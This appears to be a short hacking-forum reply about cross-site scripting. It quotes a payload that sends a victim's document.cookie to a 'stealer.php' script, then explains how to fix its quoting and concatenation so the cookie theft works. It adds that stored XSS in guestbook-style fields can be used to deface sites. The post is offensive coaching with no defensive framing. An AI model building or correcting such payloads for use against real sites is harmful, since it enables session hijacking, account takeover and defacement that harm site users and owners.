XSS - Ideas
mozzer wrote:
markup<script>document.location=stealer.php?c=document.cookie</script>
That wouldn't do what you probably want it to. For one thing, quotation marks (single or double) are required around the target location, which is ended after c=. After the location, since you want to include the user's cookie, you should put an addition sign before it. You should also have brackets around the target location (including document.cookie) instead of an equal sign.
In answer to your question, it is also possible to deface sites that have more severe cross-site scripting vulnerabilities (e.g. many guestbook scripts), more specifically sites that have vulnerable fields that are shown back to users after input is received. Some may refer to that as permanent XSS.